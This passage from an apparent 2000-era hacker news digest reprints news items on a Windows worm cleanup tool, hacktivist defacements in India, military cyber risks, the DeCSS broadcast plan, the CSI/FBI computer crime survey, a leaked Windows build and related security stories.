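      Run it against a real Windows directory only after the dropper has
      been removed and the worm's process is no longer in memory; otherwise
      it will rename the restored files again, and its random execution of
      .exe files means restoring them first can re-trigger it. The dry run
      is the default for that reason.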
      
      
      @HWA


50.0  HNN:Mar 20th:GNIT Now Freeware 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by m0nk 
      Ellicit Organization has released a freeware version of
      their latest program, GNIT NT Vulnerability Scanner. The
      scanner checks for over a dozen NT vulnerabilities. 

      Ellicit.org 
      http://security.ellicit.org/
      
      
      @HWA


51.0  HNN:Mar 20th:Online Criminals Labeled Boffins 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/


      contributed by dogcow 
      The Australian Federal Police Commissioner, Mick Palmer,
      was recently quoted as saying that while much of online
      crime is currently "in the early stages it is being done by
      people who simply are boffins and are doing it by way of
      exploration rather than criminal intent." (Glad to see
      that Australia is on top of Internet crime.) 

      Sydney Morning Herald 
      http://www.smh.com.au/news/0003/18/national/national6.html
      
      

     'Police must get ahead of e-crime' 

     By JANINE ISRAEL 

     Undetected organised electronic-crime could undermine the nation's security 
     and financial stability, the Australian Federal Police Commissioner, Mr 
     Mick Palmer, warned yesterday.

     He told a conference of Australasian and south-west Pacific police 
     commissioners in Canberra that a co-ordinated international response was 
     required urgently to crack down on electronic terrorism, child pornography, 
     racism, fraud and money laundering.

     Mr Palmer said the Internet meant crimes were being committed in countries 
     where perpetrators had "never set foot" and international legislation and 
     treaties must be set up to prosecute criminals irrespective of national 
     borders. 

     Australia, New Zealand, Fiji and Papua New Guinea police commissioners 
     announced they would establish an Australasian Law Enforcement Electronic 
     Crime Strategy to address the issue.

     Mr Palmer said the Australian police force lacked electronic expertise, and 
     was looking to recruit computer boffins to tackle electronic crime.

     "We need to be buying those skills from the cutting edge of the 
     technological workplace. We need to form close partnerships with the 
     private sector and wider government agencies," he said. 

     But employing people with the skills to fight electronic crime was costly. 
     Retention was a problem in a competitive market where those with 
     technological skills were lured by high salaries to the private sector.

     The international nature of cyberspace made it almost impossible to 
     identify perpetrators let alone snare electronic criminals. Credit card 
     fraud already was costing the credit card industry billions, Mr Palmer 
     said.

     He said growing forms of e-crime included such things as money laundering 
     and tax evasion. Cyber-stalking, illegal interceptions or "electronic 
     eavesdropping" were a concern, as were political and industrial espionage. 
     Fraudulent sales pitches along with bogus charitable or investment 
     solicitations were increasingly common.

     These were not necessarily "new crimes", Mr Palmer said, just "new methods 
     to commit traditional crimes".

     "One of the difficulties with electronic crime is that not only is it very 
     intrusive and superficially invisible, but many crimes can be committed 
     without the victim knowing it has been committed," he said.

     While e-crime is still in its "embryo state", authorities predict it will 
     expand with the electronic market to become more organised and 
     sophisticated. "Much of it in the early stages is being done by people who 
     simply are boffins and are doing it by way of exploration rather than 
     criminal intent. The damage caused by those activities is of course equally 
     serious," he said.

     He said police were "alarmed" by the capability of people to commit 
     offences on a global basis, with complete anonymity, with speed and on a
     large scale. A staggering 900 million people were expected to be using 
     the Internet by the end of the year. 

      
     @HWA

52.0  HNN:Mar 21st: Conflict In Kashmir Continues Online 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by McIntyre 
      Over 600 web sites in India including government
      systems have been defaced in recent months by people
      in Pakistan. The conflict in Kashmir is seen as one of the
      primary reasons for the defacements. 

      CNN 
      http://www.cnn.com/2000/TECH/computing/03/20/pakistani.hackers/index.html
      
      Kashmir conflict continues to
      escalate -- online

      By D. Ian Hopper
      CNN Interactive Technology Editor

      March 20, 2000
      Web posted at: 8:15 p.m. EST (0115 GMT)

      (CNN) -- A group of Pakistani
      hackers has used the conflict in
      Kashmir as a reason to deface almost
      600 Web sites in India and take
      control of several Indian government
      and private computer systems, according to the group.

      A computer security Web site -- attrition.org -- has records of the
      defacements claimed by the Muslim Online Syndicate. 

      The M0S, which a member says consists of mostly Pakistani Muslims, is
      made up of self-proclaimed "hacktivists," those who commit computer
      crimes -- ranging from simple defacement to full-scale intrusions to denial of
      service attacks -- in order to bring attention to a social cause.

      The group has nine active members, according to a representative who
      spoke on behalf of the group on condition of anonymity. They range from 16
      to 24 years old, the representative said. Several of them are students or
      computer professionals, and one is a medical student, the representative
      added.

      Unlike the majority of Web vandals, the MOS
      members say they secretly take control of a
      server, then deface the site only when they
      "have no more use" for the data or the server
      itself. 

      "The servers we control range from harmless mail and Web services to
      'heavy duty' government servers," says the MOS representative. "The data is
      only being categorically archived for later use if deemed necessary."

      The group says it's not interested in e-commerce sites or credit card
      information.

      Most of the group's defacements came in one fell swoop, when they broke
      into India's largest Internet service provider, IndiaLinks. While there, they
      defaced more than 500 sites hosted by the company, including many travel
      and company sites, IndiaLinks confirms.

      IndiaLinks, based in Bombay, hosts more than
      6,000 Web sites, according to CEO Bhavin
      Chandarana.

      Chandarana says the group had access to
      servers co-hosted by Alabanza, an American
      ISP. He says the group had access for about an
      hour.

      The MOS won't be facing any legal problems
      stemming from its exploits, Chandarana says,
      because IndiaLinks was not able to get the server logs from Alabanza.
      Chandarana says his company is in the process of removing their business
      from the U.S. ISP.

      Representatives for Alabanza did not respond to several e-mails and two
      phone messages requesting comment.

      One of the Web sites defaced was that of the Indian Science Congress
      2000. The ISC's local organizing secretary, Bhushan Patwardhan, told The
      Hindu newspaper that the defacement was removed as soon as it was
      detected.

      The MOS has a Web site mirroring its attacks that contains a well-known
      expletive. Expletives in domain names used to be taboo, but with the
      deregulation of domain registration, it is no longer forbidden.

      "We hope to bring the Kashmir conflict to the world's attention," MOS says.
      "We wish to see the day when our Muslim brethren will be given the right to
      choose, as was promised them half a century ago."

      India and Pakistan have fought two wars over the last half-century over rival
      claims for the Himalayan territory of Kashmir. They clashed again last
      summer when Pakistan-based fighters seized mountain peaks inside India. 

      Hundreds of militants died before India and Pakistan -- under international
      and domestic pressure -- withdrew their forces. 

      Ignoring world pressure, India and Pakistan both tested nuclear devices in
      1998, dramatically escalating tensions. 

      The stated goal of the MOS -- social action through hacking -- is becoming
      a more popular one. Hacktivists attacked the World Trade Organization
      Web site during their Seattle conference last year, and a mailing list helps
      concerned activists discuss strategy, targets and coordinate attacks. Rather
      than simply defacing sites, denial of service attacks have become the
      weapon of choice.

      Alex Fowler, Strategic Initiatives Director for the Electronic Frontier
      Foundation, predicted this escalation in October 1999 in an interview with
      CNN Interactive.

      "We will see very serious attacks. Information stealing could have very
      long-term consequences for consumers," Fowler said.

      
      
      @HWA


53.0  HNN:Mar 21st:Army Weapon Systems At Risk of Cyber Attack 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Evil Wench 
      Army Maj. Sheryl French has said that the possibility
      exists for intruders to infiltrate the computer systems
      used in tanks and other armored vehicles. Modern tanks
      and ships make extensive use of computers, software
      and data communications links for functions such as
      navigation, targeting and command and control. DISA
      has already tested the possibility of inputting false
      navigation data into a ship's computer from an
      unauthorized land-based laptop. 

      Federal Computer Week 
      http://www.fcw.com/fcw/articles/2000/0320/web-hacker-03-21-00.asp
      
      Hacker-controlled tanks, planes and warships? 

      BY Dan Verton 03/21/2000 

      Army officials are worried that sophisticated hackers and other 
      cybercriminals, including military adversaries, may soon have the 
      ability to hack their way into and take control of major military weapon 
      systems such as tanks and ships. 

      Speaking this month at the annual Army Directors of Information Management 
      Conference in Houston, Army Maj. Sheryl French, a program manager 
      responsible for the Army's Information Assurance Architecture for the 
      Digitized Force, said the potential exists for hackers to infiltrate the 
      computer systems used in tanks and other armored vehicles. Unlike in the 
      past, today's modern tanks and ships are almost entirely dependent on 
      computers, software and data communications links for functions such as 
      navigation, targeting and command and control. 

      Although the Pentagon has always had computer security issues to deal 
      with, "we've never had computers" in tanks and armored personnel 
      carriers before, said French, pointing to a picture of an M-1 Abrams Main 
      Battle Tank. 

      In fact, the Defense Department has already tested and proven that hackers 
      have the ability to infiltrate the command and control systems of 
      major weapons, including Navy warships. According to a training CD-ROM on 
      information assurance, published by the Defense Information Systems 
      Agency, an Air Force officer sitting in a hotel room in Boston used a 
      laptop computer to hack into a Navy ship at sea and implant false 
      navigation data into the ship's steering system. 

      "Yes, this actually happened," the CD-ROM instructs military personnel 
      taking the course. "Fortunately, this was only a controlled test to 
      see what could be done. In reality, the type of crime and its objective is 
      limited only by people's imagination and ability." 

      John Pike, a defense and intelligence analyst with the Federation of 
      American Scientists, said that although there are well-known 
      security gaps in the commercial systems that the Army plans to use on the 
      battlefield, hacking into tanks and other weapons may prove to be too 
      difficult for an enemy engaged in battle. 

      "The problem for the enemy is that computer security vulnerabilities will 
      almost certainly prove fleeting and unpredictable," said Pike, 
      adding that such tactics would be nearly impossible to employ beyond the 
      random harassment level. 
      
      @HWA


54.0  HNN:Mar 21st:2600 AU to Broadcast DeCSS 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by hool 
      In yet another twist in the MPAA vs. DeCSS case, 2600
      of Australia plans to broadcast the source code of DeCSS
      on national TV. Australian Federal copyright laws
      cannot currently prevent this broadcast. The information
      will be displayed at 12 frames per second, so it is
      recommended that viewers tape the broadcast
      and review it later frame by frame. The code is
      expected to air sometime in the next few weeks
      between 3 and 4 am. 

      Computerworld AU
      http://www.computerworld.idg.com.au/CWT1997.nsf/cwtoday/DB6C6D9B3448ECE64A2568A00075454B?OpenDocument     
      
      
      2600 AU 
      http://www.2600.org.au
      
      
      ComputerWorld;
      
      Hackers with heart 

      By Byron Kaye 
      13 March, 2000 
 
      SYDNEY - Loopholes in Federal laws mean
      hacker advocate group 2600 Australia will be able
      to broadcast DVD decryption codes and other
      sensitive information on national television within
      weeks.
 
 
      Grant Bayley, who heads up 2600 Australia, the
      international organisation's Australian operation,
      said it was currently devising a 15-second
      broadcast, which he said would contain text files,
      delivered at 12 frames per second, and suggestions
      pertaining to the "ethics" of datacasting, computer
      security and privacy, and access-controlling DVD
      encryption.
 
      Bayley said the text contained in the broadcast
      would not be comprehensible as it appeared live on
      television, but he suggested viewers record the
      broadcast on video and then watch the information
      afterwards "frame by frame".
 
      Bayley said the broadcast would be "fed" to
      Channel 10 by MindShare, a company that
      supplies advertising material in bulk for the
      television station. MindShare's own advertising
      slogan is "Head space invaders". The broadcast
      time was not yet known, but Bayley said it was
      expected to screen between 3:00 and 4:00 am
      "some time in the next few weeks".
 
      Bayley maintained information contained in the
      broadcast would "primarily encourage ethical",
      educational use of new technologies such as
      datacasting. However, he admitted some
      information -- pertaining to the decryption of DVD
      access codes -- which could not be legally
      broadcast in the US, would be screened. 
 
      Australian Federal copyright laws, even those
      currently being amended, were unable to prevent
      broadcasting of information such as DVD
      decryption codes, regardless of how commercially
      crippling the information might potentially be, he
      said. 
 
      Bayley said he was convinced that he knew the
      15-year-old hacker who penetrated the ASX
      website two weeks ago "pretty well". The ASX
      hack caused an outage of four hours, leaving the
      site littered with banner messages reading
      "Prosthetic owns the ASX". Bayley maintained
      2600 did not support or encourage vandalistic
      hack attacks such as this. "Stupid people do stupid
      things," he said.
 
      The title "2600" refers to the frequency of pitch that
      technology-savvy Americans played into their
      telephone receivers to thwart long distance call
      charges in the early 1980s.     
      
      
      
      @HWA


55.0  HNN:Mar 21st:CIA Monitoring Upheld by Court 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Evil Wench 
      The CIA's Foreign Bureau of Information Services policy
      allowing agency officials to monitor employees' Internet
      use has been upheld by a federal appeals court. The
      policy included provisions to review employees' e-mail
      messages and to collect information on their Web site
      visits. The policy had helped convict a federal employee
      of downloading child pornography on government time. 

      Government Executive Magazine 
      http://www.govexec.com/dailyfed/0300/032000m1.htm
      
      March 20, 2000

      DAILY BRIEFING
 
      Court upholds agency reviews of
      employees' Internet use
 
      By Kellie Lunney
      klunney@govexec.com
 
      A federal appeals court has upheld a CIA policy allowing
      agency officials to monitor employees' Internet use. The policy
      had helped convict a federal employee of downloading child
      pornography on government time. 
 
      The CIA's Foreign Broadcast Information Service
      implemented a policy in June 1998 authorizing "electronic
      audits" of employee computers in order to crack down on
      non-business related Internet use. Those audits included
      reviewing employees' e-mail messages and collecting
      information on their Web site visits.
 
      Later that summer, Science Applications International Corp.
      (SAIC), which had a contract to manage FBIS' computer
      network and monitor inappropriate Internet behavior, alerted
      the agency when the keyword "sex" turned up numerous hits in
      a firewall database during a routine test. The hits originated
      from the computer of Mark L. Simons, an electronic engineer
      at FBIS.
 
      FBIS officials then searched Simons' computer and office on
      four occasions, eventually compiling enough evidence to indict
      him on two counts of knowingly receiving and possessing child
      pornography downloaded from the Internet and stored on his
      government hard drive.
 
      Simons claimed that his Fourth Amendment rights had been
      violated during the searches. But a district court upheld the
      searches. Simons was found guilty and was sentenced to 18
      months in jail.
 
      The U.S. Court of Appeals for the Fourth Circuit affirmed that
      decision in late February, saying that Simons failed to prove
      that he had a "legitimate expectation of privacy in the place
      searched or the item seized."
 
      According to the appeals court, "In the final analysis, this case
      involves an employee's supervisor entering the employee's
      government office and retrieving a piece of government
      equipment in which the employee had absolutely no
      expectation of privacy [due to the agency's Internet
      policy]--equipment that the employer knew contained
      evidence of crimes committed by the employee in the
      employee's office ... Here, there was a conjunction of the
      conduct that violated the employer's policy and the conduct
      that violated the criminal law."
 
      The court's decision in USA v. Simons (99-4238) is online at
      www.law.emory.edu/4circuit/feb2000/994238.p.html.
      
      
      @HWA


56.0  HNN:Mar 21st:Make Your Reservations for RootFest Now! 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by rootfest 
      RootFest is back for its second try. RootFest 2000 will
      be June 14-16, 2000, and will be held at the brand-new
      St. Paul RiverCentre facility just 15 minutes from the
      Mall of America. Three days of speakers, events,
      contests and more are planned, making this a can't-miss
      event. 

      RootFest 
      http://www.rootfest.org/     
      
      
      @HWA
      
      

57.0  HNN:Mar 22nd:Cybercrime On The Rise 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/


      contributed by Evil Wench 
      The Computer Security Institute and the San Francisco
      FBI Computer Intrusion Squad jointly released a report
      today that said that electronic crime cost companies at
      least $266 million last year. The study found that 70%
      of the responding companies detected the unauthorized
      use of their computer systems in the last 12 months up
      from 62% the year before. Insiders and disgruntled
      employees topped the lists of worrisome security
      threats. (One conclusion that can be drawn from this
      study is that e-crime is on the rise, another is that
      people are more willing to admit intrusions or that
      detection of criminal activity has gotten better. The
      numbers are interesting but really don't say anything.) 

      ZD Net 
      http://www.zdnet.com/zdnn/stories/news/0,4586,2471718,00.html?chkpt=zdnntop
      
      

      Late Update 0943EST 
      An anonymous person was kind enough to send us a link
      directly to the summary results of the above mentioned
      survey. 

      Computer Security Institute 
      http://www.gocsi.com/prelea_000321.htm
      
      
      ZDNet;
 
      Report: 'E-crime is booming'

      Some 70 percent of companies queried in a new study have detected attacks 
      on their networks, the FBI/CSI reports.

       
      By Robert Lemos, ZDNet News UPDATED March 22, 2000 10:00 AM PT 

      SAN FRANCISCO -- Just like e-commerce, electronic crime is a booming 
      business, according to a survey released by the Computer Security 
      Institute and the San Francisco FBI Computer Intrusion Squad on Wednesday. 
      The study found that 70 percent of CSI's 585 member companies that 
      responded to its survey detected the unauthorized use of their computer 
      systems in the last 12 months -- up from 62 percent the year before. 

      "Isn't e-commerce booming? Then e-crime is booming," said Richard Power, 
      editorial director and analyst for the Computer Security Institute. 

      "The Internet revolution is going on regardless, but the more commerce 
      that goes online, the more crime that goes online as well." 

      While not a scientific estimate of computer crime, the report does measure 
      the anonymous admissions of more than 640 security professionals who are 
      part of CSI. 

      Insiders the biggest fear

      More than three-quarters of those 
      professionals identified hackers as a security threat, but insiders 
      concerned the respondents more, with 81 percent worried about disgruntled 
      employees. 

      CSI's Power explained that professional hackers are more of a threat, 
      however. "That's the real problem, not a juvenile hacker," he said. "The 
      point is, if a 16-year-old kid can do (what we have seen), then what are 
      the professionals doing?" 

      The report also indicates that corporate computer systems are far from 
      secure. Almost 90 percent of the security professionals who answered the 
      survey detected a security threat, which includes unauthorized access as 
      well as improper use of a corporate computer or e-mail and computer 
      viruses. 

      Of those intrusions, only 42 percent of the companies affected put a 
      dollar sign on the amount of damage done. The total: $266 million. 

      With only one computer security administrator per 1,000 computers, the 
      situation may not get any better soon. 
      
      -=-
      
      CSI;
      
      Mar 22, 2000
      FOR IMMEDIATE RELEASE
      Contact: Patrice Rapalus, Director
      Computer Security Institute
      600 Harrison Street
      San Francisco, CA 94107
      415/905-2310
      Internet: prapalus@cmp.com
      
 
      
      Ninety percent of survey respondents detect cyber attacks, 273 organizations
      report $265,589,940 in financial losses
      
      SAN FRANCISCO -- The Computer Security Institute (CSI) announced today the 
      results of its fifth annual "Computer Crime and Security Survey." The 
      "Computer Crime and Security Survey" is conducted by CSI with the 
      participation of the San Francisco Federal Bureau of Investigation's (FBI) 
      Computer Intrusion Squad. The aim of this effort is to raise the level of 
      security awareness, as well as help determine the scope of computer crime 
      in the United States.

      Highlights of the "2000 Computer Crime and Security Survey" include the 
      following: 

           Ninety percent of respondents (primarily large corporations and 
           government agencies) detected computer security breaches within the 
           last twelve months.

           Seventy percent reported a variety of serious computer security 
           breaches other than the most common ones of computer viruses, laptop 
           theft or employee "net abuse"--for example, theft of proprietary 
           information, financial fraud, system penetration from 
           outsiders, denial of service attacks and sabotage of data or 
           networks.

           Seventy-four percent acknowledged financial losses due to computer 
           breaches.

           Forty-two percent were willing and/or able to quantify their 
           financial losses. The losses from these 273 respondents totaled 
           $265,589,940 (the average annual total over the last three years was 
           $120,240,180).

      Financial losses in eight of twelve categories were larger than in any 
      previous year. Furthermore, financial losses in four categories were 
      higher than the combined total of the three previous years. For example, 
      61 respondents quantified losses due to sabotage of data or networks 
      for a total of $27,148,000. The total financial losses due to sabotage for 
      the previous years combined totaled only $10,848,850.

      As in previous years, the most serious financial losses occurred through 
      theft of proprietary information (66 respondents reported $66,708,000) and 
      financial fraud (53 respondents reported $55,996,000).

      Survey results illustrate that computer crime threats to large 
      corporations and government agencies come from both inside and outside 
      their electronic perimeters, confirming the trend in previous years. 
      Seventy-one percent of respondents detected unauthorized access by 
      insiders. But for the third year in a row, more respondents (59%) cited 
      their Internet connection as a frequent point of attack than cited their 
      internal systems as a frequent point of attack (38%).

      Based on responses from 643 computer security practitioners in U.S. 
      corporations, government agencies, financial institutions, medical 
      institutions and universities, the findings of the "2000 Computer Crime 
      and Security Survey" confirm that the threat from computer crime and 
      other information security breaches continues unabated and that the 
      financial toll is mounting.

      Respondents detected a wide range of attacks and abuses. Here are some 
      other examples:
      
           25% of respondents detected system penetration from the outside.
      
           27% of respondents detected denial of service attacks.
      
           79% detected employee abuse of Internet access privileges 
               (for example, downloading pornography or pirated software,
                or inappropriate use of e-mail systems).
      
           85% detected computer viruses.
      
      For the second year, we asked some questions about electronic commerce over
      the Internet. Here are some of the results:
      
           93% of respondents have WWW sites.
      
           43% conduct electronic commerce on their sites (in 1999, it was only 30%).
      
           19% suffered unauthorized access or misuse within the last twelve months.
      
           32% said that they didn't know if there had been unauthorized access or misuse.
      
           35% of those acknowledging attack, reported from two to five incidents.
      
           19% reported ten or more incidents.
      
           64% of those acknowledging an attack reported Web-site vandalism.
      
           60% reported denial of service.
      
           8% reported theft of transaction information.
      
           3% reported financial fraud.
      
      Patrice Rapalus, CSI Director, suggests that the "Computer Crime and 
      Security Survey," now in its fifth year, has delivered on its promise to 
      raise the level of security awareness and help determine the scope of 
      crime in the United States. 

      "The trends the CSI/FBI survey has highlighted over the years are 
      disturbing. Cyber crimes and other information security breaches are 
      widespread and diverse. Ninety percent of respondents reported attacks. 
      Furthermore, such incidents can result in serious damages. The 273 
      organizations that were able to quantify their losses reported a total of 
      $265,589,940. Clearly, more must be done in terms of adherence to sound 
      practices, deployment of sophisticated technologies, and most importantly 
      adequate staffing and training of information security practitioners in 
      both the private sector and government."

      Bruce J. Gebhardt is in charge of the FBI's Northern California office. 
      Based in San Francisco, his division covers fifteen counties, including 
      the continually expanding "Silicon Valley" area. Computer crime is one of 
      his biggest challenges. 

      "If the FBI and other law enforcement agencies are to be successful in 
      combating this continually increasing problem, we cannot always be placed 
      in a reactive mode, responding to computer crises as they happen. The 
      results of the CSI/FBI survey provide us with valuable data. This 
      information not only has been shared with Congress to underscore the need 
      for additional investigative resources on a national level but identifies 
      emerging crime trends and helps me decide how best to proactively, and 
      aggressively assign resources, before those 'trends' become 'crises.'" 
      
                                         ###
      
      CSI, established in 1974, is a San Francisco-based association of 
      information security professionals. It has thousands of members worldwide 
      and provides a wide variety of information and education programs to 
      assist practitioners in protecting the information assets of corporations 
      and governmental organizations. 

      The FBI, in response to an expanding number of instances in which 
      criminals have targeted major components of information and economic 
      infrastructure systems, has established the National Infrastructure 
      Protection Center (NIPC) located at FBI headquarters and the 
      Regional Computer Intrusion Squads located in selected offices throughout 
      the United States. The NIPC, a joint partnership among federal agencies 
      and private industry, is designed to serve as the government's lead 
      mechanism for preventing and responding to cyber attacks on the nation's 
      infrastructures. (These infrastructures include telecommunications, 
      energy, transportation, banking and finance, emergency services and 
      government operations). The mission of Regional Computer Intrusion Squads 
      is to investigate violations of Computer Fraud and Abuse Act (Title 8, 
      Section 1030), including intrusions to public switched networks, major 
      computer network intrusions, privacy violations, industrial espionage, 
      pirated computer software and other crimes. 
      
      Copyright 2000
      Computer Security Institute
      600 Harrison Street
      San Francisco, CA 94107
      Telephone: (415) 905-2626
      Fax: (415) 905-2218. 


      
      @HWA


58.0  HNN:Mar 22nd:The Next Version of Windows Leaked 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/


      contributed by Evil Wench 
      While Windows 2000 only just recently shipped Microsoft
      is already working on the next generation of the
      operating system. Code named Whistler, build 2211.1
      has been liberally spread around pirate sites across the
      net. 

      Beta News
      http://betanews.efront.com/article.php3?sid=953595359
      
      
      ZD Net 
      http://www.zdnet.com/zdnn/stories/news/0,4586,2471310,00.html?chkpt=zdnntop
      
      
      Beta;
      
      Whistler Hits the Web 
      By Nate Mook, eFront March 20th, 2000, 6:35 PM

      An internal build of Microsoft's future operating system, set to combine 
      consumer and business versions into a product currently codenamed Whistler 
      Windows 2001, has leaked out onto the Internet. Build number 2211.1 
      was posted onto various college and Internet sites early this morning and 
      spread as per usual, like wildfire. 

      While the new operating system currently looks almost identical to Windows 
      2000, a number of people who installed the leaked build stated there were 
      a few HTML enhancements to folders, simplifying things for novice 
      users. For example, the control panel is now by default an HTML interface, 
      offering access to a few basic configuration options. 

      Whistler does contain the infamous MarsCore.DLL file which started rumors 
      last month regarding the purpose of Mars, now known to be part of the 
      future version of Microsoft's MSN client. However, it is unknown 
      whether or not the new HTML folders are part of the Mars core or if users 
      will be given the opportunity to switch off more user friendly parts of 
      the operating system. 

      As usual with an early Alpha release, most new features and enhancements 
      will not be added until Beta 1. Keep checking back for continued coverage 
      regarding Microsoft Whistler. 

      ActiveWin contributed to this report. 
      
      -=-
      
      ZDNet;
      
      Windows 2001 leaked on the Web
 
      A pirated version of Windows 2001 is winding its way across the Net. And 
      it looks a lot like today's Windows.

      By Mary Jo Foley, ZDNet News. Updated March 21, 2000 2:03 PM PT 

      Microsoft Corp.'s next full-fledged version of Windows, code-named 
      Whistler, is at least a year away from release -- but already a pirated 
      version of one of the latest builds has found its way onto the Net.

      As reported by the Windows enthusiast sites ActiveWin and BetaNews, a 
      recent internal build of Whistler has been posted illegally to a number of 
      college and Internet sites. 

      ActiveWin and BetaNews are reporting that Build 2211.1 was posted Tuesday 
      morning and "spread as per usual, like wildfire." 

      Whistler is the code name for the first full-fledged upgrade to Windows 
      2000 that will be based on the Windows NT kernel, rather than the Windows 
      9X kernel. (The Windows 9X update is code-named Millennium and expected to 
      ship in the third or fourth quarter of this year.) Whistler is tentatively 
      slated to ship in March 2001, according to internal Microsoft documents. 

      Microsoft (Nasdaq: MSFT) won't comment on where Whistler is in the 
      development process. But sources close to the company say the latest 
      "stable" internal developers build is numbered 2207. The most recent 
      internal test build is 2214, sources add. 

      A Microsoft spokesman said the company was investigating reports of 
      pirated Whistler builds but would make no further comment. 

      Looks like Win2000 -- so far

      As noted by ActiveWin, the pirated Whistler build looks almost identical 
      to Windows 2000 Professional. 

      "A number of people who installed the leaked build stated there were a few 
      HTML enhancements to folders, simplifying things for novice users," 
      ActiveWin reported. "For example, the control panel is now by default an 
      HTML interface, offering access to a few basic configuration options." 

      One change under the hood, according to ActiveWin, is the inclusion of the 
      MarsCore.DLL file. "Mars" is the code name for user interface technology 
      slated to be included in a future version of Microsoft's MSN client. At 
      one point, Mars was used as the code name for the next version of a 
      consumer-oriented version of Internet Explorer. After signing up Mars beta 
      testers last fall, Microsoft sent out a note telling testers it had 
      delayed the start of the beta because the company was "rethinking some of 
      our most basic assumptions" regarding the future user interfaces.

      It isn't just in the user interface that Microsoft has been redrawing its 
      Windows road map. 

      In January, Microsoft acknowledged that it had tabled work on "Neptune," a 
      consumer version of Windows slated to follow Millennium, and on "Odyssey," 
      an NT-kernel-based follow-on to Windows 2000. Instead, Microsoft said, it 
      planned to merge the Neptune and Odyssey code bases in the form of 
      Whistler. 

      The follow-on to Whistler, code-named Blackcomb, is expected to ship in 
      2002 or later. 

 
      @HWA


59.0  HNN:Mar 22nd:Toronto Business Held For Extortion 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/ 


      contributed by Evil Wench 
      An unnamed business in the Toronto area was held for
      ransom of less than $5,000 after a 14 year old youth
      took control of the company's chat-room and email
      servers. Police arrested the individual after arranging a
      meeting to deliver the money. The youth has been
      charged with extortion, mischief to data, fraudulently
      possessing a computer password, production and
      possession of counterfeit money, and two counts of
      unauthorized use of a computer. (And they say there
      are not enough computer crime laws.) 

      National Post 
      http://www.nationalpost.com/news.asp?f=991222/158060&s2=national&s3=news
      
      Wednesday, December 22, 1999

      14-year-old computer whiz
      charged after company given
      extortion demand
      Arrested in Keswick

      Chris Eby
      National Post 

      A 14-year-old computer whiz, who allegedly hacked into the
      accounts of a downtown Toronto business and tried to extort the
      owners, was charged yesterday with a raft of extortion and
      counterfeiting-related offences after a police sting operation. 

      The boy, who cannot be named under the Young Offenders Act,
      took control of the business's e-mail and chat rooms -- two
      operations vital to the business' survival -- for two weeks. He
      contacted the owner of the business through the Internet, demanding
      cash before he returned control of the accounts. 

      "He obviously displays a capability in computers that appears to be
      above average," said Detective Myron Demkiw. "They're pretty
      serious offences ... this is all relatively new ground for everybody." 

      The owner of the business contacted police, who traced the suspect
      to Keswick, a town 60 kilometres north of Toronto. 

      Investigators arranged a meeting on Monday where the suspect was
      supposed to receive the money he was demanding (a sum less than
      $5,000 was all police would say), and was arrested. 

      "He was calm throughout," Det. Demkiw said of the youth. 

      As a result of the investigation, detectives executed a search warrant
      on the boy's home and seized his computer, related documents, and
      some counterfeit money. 

      When asked if he had ever come across anything like this, Det.
      Demkiw replied: "No, never, and this will be something new to
      the courts as well." 

      The youth has been charged with extortion, mischief to data,
      fraudulently possessing a computer password, production of
      counterfeit money, and two counts each of unauthorized use of a
      computer, and possession of counterfeit money.
      
      @HWA
      
60.0  HNN:Mar 22nd:Is the Census Secure? 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Evil Wench 
      The long form of the US Census has sparked privacy
      concerns ever since it was introduced in 1960. With the
      increased awareness of computer security and identity
      theft those fears are even greater. Some residents fear
      giving out their personal information on the off chance
      that it may be stolen or otherwise fall into the wrong
      hands. The Census Bureau has taken some solace in the
      fact that it has never suffered a computer related
      break-in. 

      Philadelphia Inquirer 
      http://www.phillynews.com/inquirer/2000/Mar/21/front_page/PCENSUS21.htm
      
      
      Census queries raising computer-security questions 

      New inquiries strike some as an opening to hackers or invasions of privacy.
      Bureau officials say fears could reduce responses.

      By Thomas Ginsberg
      INQUIRER STAFF WRITER
      
      Betty McAdams is afraid computer hackers could steal her personal information. 
      Joe Alessandroni figures marketers somehow will buy his. Entire Web sites 
      question the government's right to the data at all.

      In the last two weeks, about 15 million Americans began receiving the most 
      intrusive government questionnaire most will ever fill out. The "Long 
      Form" from the U.S. Census Bureau - 37 pages filled with 53 questions 
      about everything from language skills to toilets - is prompting some 
      recipients to squeal about invasion of privacy, a complaint that has 
      arisen every decade since the long form was launched in 1960.

      This year, however, Census officials and privacy experts said they detect 
      a more pointed fear: concern about computer security. The growth of the 
      Internet since the 1990 Census along with high-profile attacks on Web 
      sites such as Yahoo have exacerbated already-rising concerns about the 
      safety of any information on any computer anywhere.

      "Alarmed is a good word," said McAdams, 51, of Philadelphia, an assistant 
      director of Greater Philadelphia First, an alliance of business executives 
      in the region. "I assume they're going to compile all this information on 
      a computer somewhere. . . . Probably if [computer hacking] had not 
      happened so recently, I might not be as alarmed."

      To increasing numbers of people, the country is facing a "privacy 
      Chernobyl," said Robert R. Belair, a Washington-based privacy lawyer and 
      editor of a national newsletter on business privacy. "It doesn't surprise 
      me that the Census Bureau is going to have more trouble this year than 
      before."

      Unfortunately, some salient facts get lost in the din: The Census Bureau 
      has never suffered a computer-related security breach, experts agree.

      Its computers are kept separate from other government systems, and 
      respondents' names are separated from personal data when the results are 
      eventually compiled into databases, Census officials say.

